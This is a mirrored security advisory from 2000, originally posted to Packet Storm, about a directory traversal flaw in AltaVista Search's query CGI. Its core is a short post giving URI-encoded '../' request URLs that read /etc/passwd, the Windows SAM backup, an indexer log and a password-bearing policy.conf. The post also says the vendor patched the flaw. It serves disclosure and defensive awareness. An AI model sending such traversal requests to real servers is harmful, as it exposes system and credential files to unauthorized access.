Lucene search

K

altavista.txt

🗓️ 12 Jan 2000 00:00:00Reported by RCType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 50 Views

Potential vulnerabilities in AV-Search allow unauthorized file access via URI-encoded strings.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`hola,  
  
more bugs in the AV-Search thing ..  
  
using uri-encoded strings it is possible to view "any" file on the system ..  
  
examples:  
  
unixxxsss ...  
  
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd  
  
or on an micro$oft IIS ...  
  
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._  
  
interesting infos about the file structure ...  
  
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/indexer.log  
  
or another file which does contain the password ..  
  
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/policy.conf  
  
altavista told me that this is(was) just a flavour of the "old" bug and its  
fix is(was) included in the last secpatch.  
  
whatever ....  
  
nicedays :-/  
  
RC  
[email protected]  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
12 Jan 2000 00:00Current
7.4High risk
Vulners AI Score7.4
50
.json
Report